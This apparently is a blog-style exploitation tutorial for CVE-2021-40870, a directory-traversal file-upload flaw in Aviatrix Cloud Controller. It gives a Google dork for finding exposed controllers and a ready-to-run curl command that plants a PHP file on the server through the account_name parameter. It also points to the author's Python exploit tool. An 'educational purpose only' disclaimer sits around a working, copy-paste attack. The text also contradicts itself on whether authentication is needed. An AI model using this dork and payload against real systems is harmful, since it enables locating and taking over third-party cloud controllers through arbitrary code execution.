Unrestricted upload of file with dangerous type in Aviatrix allows an authenticated user to execute arbitrary code [CVE-2021–40870]
Similar APIs designed to upload files from authenticated users did not properly sanitize their destination input, allowing directory traversal attacks which could eventually allow an authenticated attacker to execute code on the controller.
So Directory traversal Actually allowing an unauthenticated attacker to execute code or store code on controller.
So before exploiting this vulnerability we need to find it , We can do that using google or shodan lets start with google.
intitle:"Aviatrix Cloud Controller"
Shodan contains more result than google, other search engine like shodan will be helpful.Finding this vulnerability and exploiting it in the wild is not a good idea cause if those target doesn’t support , testing by outsider that means its not legal. [Educational purpose only]
We can exploit this vulnerability using curl or python3 . Lets start with curl,
curl -k https://domain.tld/v1/backend1 -d CID=x -d action=set_metric_gw_selections -d account_name=/../../../var/www/php/test.php -d 'data=hello<?php phpinfo()?>'
It will return success , that doesn’t mean you have successfully exploited the vulnerability , check if file is really saved or not with this path https://domain.tld/v1/test.
We used the test at the last because in account_name parameter we give the php file test.php name you can changed that , after changing that the file name will also be changed on exploit path and in data parameter we gave our php code that will be save in the file. exploiting this vulnerability is kinda easy for attacker and its quite harmful cause an attacker can store php code on your control.
You also can use the python3 exploit i wrote:
GitHub - JoyGhoshs/CVE-2021-40870: Unrestricted upload of file with dangerous type in Aviatrix…
Unrestricted upload of file with dangerous type in Aviatrix allows an authenticated user to execute arbitrary code …
on -u give target url , on -c give your php code , on -n give file name
[Do not use information on this article for any illegal activity , if you use i am not responsible for this]